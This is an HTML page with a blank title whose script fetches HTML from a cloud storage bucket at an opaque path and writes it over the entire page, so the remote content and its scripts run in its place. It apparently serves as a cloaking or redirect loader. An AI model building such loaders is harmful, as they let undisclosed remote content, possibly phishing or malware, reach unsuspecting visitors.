<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title></title>
	<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=0,viewport-fit=cover">
</head>
<body>
<script>
        function loadJs(a) {
            var c = document.createElement("script");
            c.src = a, document.body.appendChild(c);
        }

        function getUrlParam(name) {
            var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)");
            var r = window.location.href.match(reg);
            if (r != null) return unescape(r[2]);
            return null;
        }

        function Dget(e, t, a) {
            var n = new XMLHttpRequest;
            n.onreadystatechange = function() {
                4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
            };
            n.ontimeout = function(e) {};
            n.open("GET", e, !0), n.send(null)
        }
        var temp = getUrlParam('temp');
        var temp_name = temp + '.html';
        Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/ydsxxsqwefer.html', function(res) {
            var doc = document.open("text/html", "replace");
            doc.write(res);
            doc.close()
        })
    </script>	
</body>
</html>
